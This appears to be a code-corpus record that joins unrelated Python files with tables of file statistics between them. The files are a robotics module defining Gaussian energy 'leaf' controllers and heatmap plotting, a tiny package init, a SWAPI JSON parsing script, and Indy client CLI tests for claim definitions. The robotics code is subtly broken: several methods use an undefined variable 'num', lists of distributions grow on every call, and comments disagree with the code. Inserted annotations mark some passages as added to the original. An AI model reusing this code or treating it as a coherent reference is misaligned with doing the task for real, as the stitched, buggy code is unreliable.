return self.p_dx.log_prob(action) # torch.Size([1000])
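# --- Illustrative sketch (added; not part of the original module) ---
# The leaf above follows the pattern used throughout this file: set_context() turns the
# current state into a multivariate Gaussian over desired actions, and log_prob() scores a
# batch of candidate actions against it. The small helper below reproduces just that
# scoring step with a plain Gaussian so it stays self-contained; the function name and
# shapes are assumptions for illustration only.
def _example_score_candidates(mu, var, n_candidates=1000):
    """Score random candidate actions under N(mu, var) and return the highest-scoring one."""
    p_dx = tdist.MultivariateNormal(mu, var)
    candidates = torch.randn(n_candidates, mu.shape[0])  # e.g. sampled spatial velocities
    scores = p_dx.log_prob(candidates)                   # torch.Size([n_candidates])
    return candidates[scores.argmax()]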
class JointGoToLeaf(EnergyLeaf):
def __init__(self, dim=7, Kp = 1., Kv = 1.,
q_des=torch.tensor([2.0, 0.1, 2.0, 1.0, 0.2, -1.0, 0.3]),
# ([2.215, 0.088, 2.156, 1.060, 0.238, -1.023, 0.373]),
dq_des=torch.tensor([0., 0., 0., 0., 0., 0., 0.]),
var=torch.eye(7).float() * 100.):
super(JointGoToLeaf, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.q_des = q_des
#self.register_buffer('q_des', q_des)
self.dq_des = dq_des
#self.register_buffer('dq_des', dq_des)
self.var = var
# TODO: 07.10 -> Low variance for joints related to the elbow and big variance for the rest of the joints
self.var[2][2] = 10.
self.var[3][3] = 10.
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
q = state[0] # Tensor(7, 1), joint position values
dq = state[1] # Tensor (7, 1), joint speed values
###########################################
ddq = self.Kp * (self.q_des - q) + self.Kv * (self.dq_des - dq)
self.p_dx = tdist.MultivariateNormal(ddq, self.var) # self.var->torch.size(7, 7)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 7])
return self.p_dx.log_prob(action) # torch.Size([1000])
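# --- Worked example (added): the PD-style mean used in set_context() above ---
# For a single joint with Kp = Kv = 1, q_des = 2.0, q = 1.5, dq_des = 0.0 and dq = 0.4
# (values chosen purely for illustration):
#     ddq = Kp * (q_des - q) + Kv * (dq_des - dq) = 1 * 0.5 + 1 * (-0.4) = 0.1
# so the Gaussian over joint accelerations is centred at 0.1 for that joint: the leaf pulls
# the joint toward q_des while damping its current velocity.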
class JointGoToLeaf_lefthand_and_base(EnergyLeaf):
def __init__(self, dim=10, Kp = 1., Kv = 1.,
q_des=torch.tensor([1.2, 1.0, 0., 2.0, 0.1, 2.0, 1.0, 0.2, -1.0, 0.3]),
# ([2.215, 0.088, 2.156, 1.060, 0.238, -1.023, 0.373]),
dq_des=torch.tensor([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]),
var=torch.eye(10).float() * 100.):
super(JointGoToLeaf_lefthand_and_base, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.q_des = q_des
#self.register_buffer('q_des', q_des)
self.dq_des = dq_des
#self.register_buffer('dq_des', dq_des)
self.var = var
# TODO: 07.10 -> Low variance for joints related to the elbow and big variance for the rest of the joints
self.var[0][0] = 10.
# NOTE: the original repeated the self.var[0][0] assignment here; the duplicate had no
# effect (self.var[1][1] may have been intended for the base's second DoF).
# self.var[2][2] = 10.
# self.var[3][3] = 10.
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
q = state[0] # Tensor(7, 1), joint position values
dq = state[1] # Tensor (7, 1), joint speed values
###########################################
ddq = self.Kp * (self.q_des - q) + self.Kv * (self.dq_des - dq)
self.p_dx = tdist.MultivariateNormal(ddq, self.var) # self.var->torch.size(7, 7)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 7])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_lefthand_and_base(EnergyLeaf):
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 5.):
super(PathPlanLeaf_lefthand_and_base, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
#print("state: ", state)
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
#print("v_t: ", v_t)
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
self.p_dx = tdist.MultivariateNormal(ddx_t, self.var)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_lefthand_and_base_np(EnergyLeaf):
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_lefthand_and_base_np, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = np.around(torch2numpy(xy), 3).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = np.around(torch2numpy(v), 3).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.cascade_control_get_n_ddx(xy_t, v_t, num=2) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
# The N multivariate gaussian distribution
for i in range(num):
cur_gaussian = tdist.MultivariateNormal(ddx_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
# The summation of n multivariate gaussian distribution
num = 2
g = []
for i in range(num):
g.append(torch.unsqueeze(self.p_dx[i].log_prob(action), dim=1))
result = torch.logsumexp(torch.stack(g, dim=2), dim=2).reshape(1000, )
#result = self.p_dx[0].log_prob(action)
# g0 = torch.unsqueeze(self.p_dx[0].log_prob(action), dim=1)
# g1 = torch.unsqueeze(self.p_dx[1].log_prob(action), dim=1)
# g2 = torch.unsqueeze(self.p_dx[2].log_prob(action), dim=1)
# result = torch.logsumexp(torch.stack([g0, g1, g2], dim=2), dim=2).reshape(1000, )
return result
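# --- Illustrative sketch (added; not part of the original module) ---
# log_prob() above combines the N per-point Gaussians with a logsumexp over the component
# dimension, i.e. an unweighted, unnormalised mixture evaluated in log-space. The helper
# below shows that reduction on its own; the name and shapes are assumptions for
# illustration only.
def _example_mixture_log_prob(components, actions):
    """components: list of tdist.MultivariateNormal; actions: tensor of shape [N, dim]."""
    per_component = [c.log_prob(actions).unsqueeze(1) for c in components]  # each [N, 1]
    stacked = torch.stack(per_component, dim=2)                             # [N, 1, K]
    return torch.logsumexp(stacked, dim=2).squeeze(1)                       # [N]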
class PathPlanLeaf_pos(EnergyLeaf_x): # TODO: heatmap of position | add 09.13
def __init__(self, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_pos, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
self.closest_point = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t)
# ddx_t = torch.tensor(ddx)
pos = cascade_control_dx.cascade_control_get_x(xy_t, v_t) # TODO: Return 1 closest point
pos_t = torch.tensor(pos)
self.closest_point = pos
closest_points.append(pos)
self.p_dx = tdist.MultivariateNormal(pos_t, self.var) # TODO: Define a gaussian distribution
def log_prob(self, action, state):
"""
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
"""
# TODO: add euler discretization | 09.13
action = action[:, :self.dim] # torch.Size([1000, 2])
q_t = state[0] # torch.Size([2]), x and y
dq_t = state[1] # torch.Size([2]), dx, dy
##########################################
ddq_t = action
dq_t = dq_t + ddq_t * 1./240.
q_t = q_t + dq_t * 1./240.
# TODO: add heatmap | 09.13
global path
global CREATE_DIR
if not CREATE_DIR:
path = self.create_dir()
CREATE_DIR = True
global count
if count % 1500 == 1:
grid_map = self.gen_gridmap()
log_map = torch.exp(self.p_dx.log_prob(grid_map))
fig = self.gen_heatmap(log_map=log_map, closest_point=self.closest_point, current_point=state[0])
self.save_heatmap(fig, path)
count += 1
##########################################
return self.p_dx.log_prob(q_t) # torch.Size([1000])
def gen_gridmap(self):
"""
Return a grid map with tensorsize([nc*nr, 2]) for heatmap generation
"""
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
ic(x)
ic(y)
nr = len(x)
nc = len(y)
grid_map = []
cur_grid = [0, 0]
for i in range(nr):
for j in range(nc):
cur_grid[0] = x[i][j]
cur_grid[1] = y[i][j]
grid_map.append(cur_grid)
cur_grid = [0, 0]
grid_map = torch.tensor(grid_map)
return grid_map
def gen_heatmap(self, log_map, closest_point, current_point):
"""
log_map: torch.tensorsize([nc* nr, 2])
"""
fig, ax = plt.subplots(1, 1) # TODO: Initialize fig
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
nr = len(x)
nc = len(y)
log_map = log_map.reshape((nr, nc))
log_max, log_min = log_map.max(), log_map.min()
# Mark the goal point
goal_circle = plt.Circle((1.2, 1.0), 0.01, color='r', fill=True)
ax.text(1.2, 1.0, s='goal', fontsize=8.)
ax.add_patch(goal_circle)
# Mark the current point
current_circle = plt.Circle((current_point[0], current_point[1]), 0.01, color='y', fill=True)
ax.text(current_point[0], current_point[1], s='current', fontsize=8.)
ax.add_patch(current_circle)
# Mark the closest point
closest_circle = plt.Circle((closest_point[0], closest_point[1]), 0.01, color='g', fill=True)
ax.text(closest_point[0], closest_point[1], s='closest', fontsize=8.)
ax.add_patch(closest_circle)
# Mark the arrow
delta_x, delta_y = closest_point[0]-current_point[0], closest_point[1]-current_point[1]
delta = math.sqrt(pow(delta_x, 2)+pow(delta_y, 2))
ax.arrow(current_point[0], current_point[1], dx=delta_x/delta * 0.08, dy=delta_y/delta * 0.08, width=0.001, head_width=0.025, color='y')
c = ax.pcolor(x, y, log_map, cmap='RdBu', vmin=log_min, vmax=log_max)
ax.set_title('Closest point heatmap')
fig.colorbar(c, ax=ax)
fig.tight_layout()
plt.show()
return fig
def create_dir(self):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
base_dir = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
heatmap_dir = os.path.join(base_dir, "Results_figure/heatmap/")
path = os.path.join(heatmap_dir, t)
os.mkdir(path)
return path
def save_heatmap(self, fig, path):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
fig.savefig(path+'/heatmap_{}.png'.format(t), dpi=300)
class PathPlanLeaf_n_pos(EnergyLeaf_x): # TODO: heatmap of position | add 09.15
def __init__(self, dim=2, Kp=1., Kv=1., var=torch.eye(2).float() * 1.):
super(PathPlanLeaf_n_pos, self).__init__()
self.dim = dim
self.Kp = Kp
# self.register_buffer('Kp', Kp)
self.Kv = Kv
# self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
self.closest_point = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# ddx = cascade_control_dx.cascade_control_get_dx(xy_t, v_t)
# ddx_t = torch.tensor(ddx)
pos_n = cascade_control_dx.cascade_control_get_n_x(xy_t, v_t, num=2) # TODO: Return N closest points
pos_t = torch.tensor(pos_n)
self.closest_point = pos_n
closest_points.append(pos_n)
# N closest points ===>>> N gaussian distributions
for i in range(len(pos_n)):
cur_gaussian = tdist.MultivariateNormal(pos_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action, state):
"""
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
"""
# TODO: add euler discretization | 09.13
action = action[:, :self.dim] # torch.Size([1000, 2])
q_t = state[0] # torch.Size([2]), x and y
dq_t = state[1] # torch.Size([2]), dx, dy
##########################################
ddq_t = action
dq_t = dq_t + ddq_t * 1. / 240.
q_t = q_t + dq_t * 1. / 240.
# TODO: add heatmap | 09.13
global path
global CREATE_DIR
if not CREATE_DIR:
path = self.create_dir()
CREATE_DIR = True
global count
gg = []
if count % 2000 == 1:
print("self.closest_point: ", self.closest_point)
for i in range(num):
grid_map = self.gen_gridmap()
gg.append(torch.unsqueeze(self.p_dx[i].log_prob(grid_map), dim=1))
log_map = torch.exp(torch.logsumexp(torch.stack(gg, dim=2), dim=2)).reshape(len(grid_map),)
fig = self.gen_heatmap(log_map=log_map, closest_point=self.closest_point, current_point=state[0])
self.save_heatmap(fig, path)
count += 1
###########################################
g = []
for i in range(num):
g.append(torch.unsqueeze(self.p_dx[i].log_prob(q_t), dim=1))
result = torch.exp(torch.logsumexp(torch.stack(g, dim=2), dim=2)).reshape(1000, )
return result
def plot_multi_gaussian(self):
pass
def gen_gridmap(self):
"""
Return a grid map with tensorsize([nc*nr, 2]) for heatmap generation
"""
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
ic(x)
ic(y)
nr = len(x)
nc = len(y)
grid_map = []
cur_grid = [0, 0]
for i in range(nr):
for j in range(nc):
cur_grid[0] = x[i][j]
cur_grid[1] = y[i][j]
grid_map.append(cur_grid)
cur_grid = [0, 0]
grid_map = torch.tensor(grid_map)
return grid_map
def gen_heatmap(self, log_map, closest_point, current_point):
"""
log_map: torch.tensorsize([nc* nr, 2])
"""
fig, ax = plt.subplots(1, 1) # TODO: Initialize fig
dx, dy = -0.01, 0.01
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[1.78:-0.78 + dx:dx, -0.78:1.78 + dy:dy]
nr = len(x)
nc = len(y)
log_map = log_map.reshape((nr, nc))
log_max, log_min = log_map.max(), log_map.min()
# Mark the goal point
goal_circle = plt.Circle((1.2, 1.0), 0.01, color='r', fill=True)
ax.text(1.2, 1.0, s='goal', fontsize=8.)
ax.add_patch(goal_circle)
# Mark the current point
current_circle = plt.Circle((current_point[0], current_point[1]), 0.01, color='y', fill=True)
#ax.text(current_point[0], current_point[1], s='cur', fontsize=8.)
ax.add_patch(current_circle)
# Mark the closest point
for i in range(len(self.closest_point)):
closest_circle = plt.Circle((closest_point[i][0], closest_point[i][1]), 0.01, color='g', fill=True)
ax.text(closest_point[i][0], closest_point[i][1], s='closest', fontsize=8.)
ax.add_patch(closest_circle)
# Mark the arrow
for i in range(len(self.closest_point)):
delta_x, delta_y = closest_point[i][0] - current_point[0], closest_point[i][1] - current_point[1]
delta = math.sqrt(pow(delta_x, 2) + pow(delta_y, 2))
ax.arrow(current_point[0], current_point[1], dx=delta_x / delta * 0.06, dy=delta_y / delta * 0.05, width=0.0005,
head_width=0.03, color='y')
c = ax.pcolor(x, y, log_map, cmap='RdBu', vmin=log_min, vmax=log_max)
ax.set_title('Closest point heatmap')
fig.colorbar(c, ax=ax)
fig.tight_layout()
plt.show()
return fig
def create_dir(self):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
base_dir = os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
heatmap_dir = os.path.join(base_dir, "Results_figure/heatmap/")
path = os.path.join(heatmap_dir, t)
os.mkdir(path)
return path
def save_heatmap(self, fig, path):
t = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime())
fig.savefig(path+'/heatmap_{}.png'.format(t), dpi=300)
class PathPlanLeaf_trackfather(EnergyLeaf):
def __init__(self, dim=2, Kp=1., Kv=1., var=torch.eye(2).float() * 0.1):
super(PathPlanLeaf_trackfather, self).__init__()
self.dim = dim
self.Kp = Kp
# self.register_buffer('Kp', Kp)
self.Kv = Kv
# self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_t = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_t = torch2numpy(v).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx = cascade_control_dx.track_father_get_ddx(xy_t, v_t, K=1) # TODO: Return n ddx from x points | 09.02
ddx_t = torch.tensor(ddx)
self.p_dx = tdist.MultivariateNormal(ddx_t, self.var)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
return self.p_dx.log_prob(action) # torch.Size([1000])
class PathPlanLeaf_track_Nfather(EnergyLeaf): # TODO: added on 09.23
def __init__(self, K=1, dim=2, Kp = 1., Kv = 1., var=torch.eye(2).float() * .01):
super(PathPlanLeaf_track_Nfather, self).__init__()
self.dim = dim
self.Kp = Kp
#self.register_buffer('Kp', Kp)
self.Kv = Kv
#self.register_buffer('Kv', Kv)
self.var = var
## Multivariate Gaussian distribution ##
self.p_dx = []
self.K = K
self.params = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
xy = state[0] # torch.Size([2]), x and y
xy_l = torch2numpy(xy).tolist()
v = state[1] # torch.Size([2]), dx, dy
v_l = torch2numpy(v).tolist()
# TODO: NEED to set a multivariable gaussian distribution of dx. | added on 08.13, 08.17
###########################################
ddx, x_goal_dist = cascade_control_dx.track_father_get_n_ddx(xy_l, v_l, K=self.K) # TODO: Return K ddx from x points | 09.22
ddx_t = torch.tensor(ddx)
#print("ddx_t: ", ddx_t)
max_idx = int(torch.argmax(x_goal_dist))
self.params = [0.] * len(x_goal_dist)
self.params[max_idx] = 1.
# self.params = x_goal_dist
# N closest points ===>>> N gaussian distributions
for i in range(len(ddx_t)):
cur_gaussian = tdist.MultivariateNormal(ddx_t[i], self.var)
self.p_dx.append(cur_gaussian)
def log_prob(self, action):
'''
Target Energy is an energy function that provides the desired velocity given the current state p(\dot{x} | x)
We will model it with a Gaussian distribution
'''
# TODO:
action = action[:, :self.dim] # torch.Size([1000, 2])
# NOTE: the original first built an (unweighted) logsumexp mixture over `num` components
# and then immediately overwrote `result` with the weighted sum below, so that first
# computation was dead code; it is kept here, commented out, for reference.
# g = []
# for i in range(num):
#     g.append(torch.unsqueeze(self.p_dx[i].log_prob(action), dim=1))
# result = torch.exp(torch.logsumexp(torch.stack(g, dim=2), dim=2)).reshape(5000, )
result = self.p_dx[0].log_prob(action) * self.params[0] + \
self.p_dx[1].log_prob(action) * self.params[1]
# #self.p_dx[2].log_prob(action) * self.params[2]
return result # torch.Size([1000])
| 32.65
| 144
| 0.562021
| 3,768
| 26,120
| 3.743365
| 0.08413
| 0.012761
| 0.017866
| 0.003119
| 0.85374
| 0.808295
| 0.785892
| 0.771287
| 0.747465
| 0.737256
| 0
| 0.039574
| 0.287979
| 26,120
| 800
| 145
| 32.65
| 0.718841
| 0.282619
| 0
| 0.669136
| 0
| 0
| 0.015208
| 0.00263
| 0
| 0
| 0
| 0.02125
| 0
| 1
| 0.091358
| false
| 0.002469
| 0.032099
| 0
| 0.187654
| 0.004938
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc3f2efad981ac61a0cf52f912cf9d73000f25c8
| 103
|
py
|
Python
|
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
pud/interface/__init__.py
|
gwangyi/pud
|
23a5ff8a3592ce640ab04569f4cc9ce38883b47b
|
[
"Apache-2.0"
] | null | null | null |
from ._common import Device, Command, command
from ._common import load_protocol, available_protocols
| 25.75
| 55
| 0.834951
| 13
| 103
| 6.307692
| 0.692308
| 0.243902
| 0.390244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116505
| 103
| 3
| 56
| 34.333333
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc8420775b7cf45dce42a4d020b674d07a21528b
| 1,471
|
py
|
Python
|
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
ClassFiles/Python201/APIs/ReadingJson.py
|
minefarmer/CompletePython
|
6de46e7ee29d9e4eaada60352c193f552afd6f15
|
[
"Unlicense"
] | null | null | null |
import json
c3p0 = '''{
"name": "C-3PO",
"height": "167",
"mass": "75",
"hair_color": "n/a",
"skin_color": "gold",
"eye_color": "yellow",
"birth_year": "112BBY",
"gender": "n/a",
"homeworld": "http://swapi.dev/api/planets/1/",
"films": [
"http://swapi.dev/api/films/1/",
"http://swapi.dev/api/films/2/",
"http://swapi.dev/api/films/3/",
"http://swapi.dev/api/films/4/",
"http://swapi.dev/api/films/5/",
"http://swapi.dev/api/films/6/"
],
"species": [
"http://swapi.dev/api/species/2/"
],
"vehicles": [],
"starships": [],
"created": "2014-12-10T15:10:51.357000Z",
"edited": "2014-12-20T21:17:50.309000Z",
"url": "http://swapi.dev/api/people/2/"
}'''
c3p0 = json.loads(c3p0)
# print(c3p0['name']) # C-3PO
# print(type(c3p0)) # <class 'dict'>
c3p0['name'] = "Kane Ezki"
c3p0_str = json.dumps(c3p0)
print(c3p0_str) # {"name": "Kane Ezki", "height": "167", "mass": "75", "hair_color": "n/a", "skin_color": "gold", "eye_color": "yellow", "birth_year": "112BBY", "gender": "n/a", "homeworld": "http://swapi.dev/api/planets/1/", "films": ["http://swapi.dev/api/films/1/", "http://swapi.dev/api/films/2/", "http://swapi.dev/api/films/3/", "http://swapi.dev/api/films/4/", "http://swapi.dev/api/films/5/", "http://swapi.dev/api/films/6/"], "species": ["http://swapi.dev/api/species/2/"], "vehicles": [], "starships": [], "created": "2014-12-10T15:10:51.357000Z", "edited": "2014-12-20T21:17:50.309000Z", "url": "http://swapi.dev/api/people/2/"}
| 40.861111
| 640
| 0.600952
| 223
| 1,471
| 3.919283
| 0.273543
| 0.185355
| 0.24714
| 0.308924
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0.842105
| 0
| 0.100828
| 0.096533
| 1,471
| 35
| 641
| 42.028571
| 0.55681
| 0.46499
| 0
| 0.0625
| 0
| 0
| 0.855314
| 0.076825
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0.03125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fc977a2539222a6a21621836ed3d71a1ac58df88
| 3,183
|
py
|
Python
|
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
indy_client/test/cli/test_send_claim_def.py
|
ArtObr/indy-node
|
f3491c42eba1a1b45df98f0e4dabe749d281ae33
|
[
"Apache-2.0"
] | null | null | null |
from indy_client.test.cli.constants import SCHEMA_ADDED, CLAIM_DEF_ADDED
from indy_client.test.cli.helper import getSeqNoFromCliOutput
def test_send_claim_def_succeeds(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.0'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
def test_send_claim_def_fails_if_ref_is_seqno_of_non_schema_txn(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.1'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
firstClaimDefSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='Schema with seqNo {ref} not found',
mapper={'ref': firstClaimDefSeqNo},
within=5)
def test_send_claim_def_fails_if_ref_is_not_existing_seqno(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.2'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED, within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='Schema with seqNo {ref} not found',
mapper={'ref': schemaTxnSeqNo + 1},
within=5)
def test_can_not_send_claim_def_for_same_schema_and_signature_type(
be, do, poolNodesStarted, trusteeCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.3'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect='can have one and only one CLAIM_DEF',
mapper={'ref': schemaTxnSeqNo},
within=5)
def test_can_send_same_claim_def_by_different_issuers(
be, do, poolNodesStarted, trusteeCli, newStewardCli):
be(trusteeCli)
do('send SCHEMA name=Degree version=1.4'
' keys=undergrad,last_name,first_name,birth_date,postgrad,expiry_date',
expect=SCHEMA_ADDED,
within=5)
schemaTxnSeqNo = getSeqNoFromCliOutput(trusteeCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
be(newStewardCli)
do('send CLAIM_DEF ref={ref} signature_type=CL',
expect=CLAIM_DEF_ADDED,
mapper={'ref': schemaTxnSeqNo},
within=239)
| 30.902913
| 78
| 0.70311
| 402
| 3,183
| 5.313433
| 0.169154
| 0.074906
| 0.067416
| 0.052434
| 0.82912
| 0.784644
| 0.784644
| 0.784644
| 0.784644
| 0.735955
| 0
| 0.013261
| 0.194471
| 3,183
| 103
| 79
| 30.902913
| 0.819813
| 0
| 0
| 0.746667
| 0
| 0
| 0.306533
| 0.105214
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
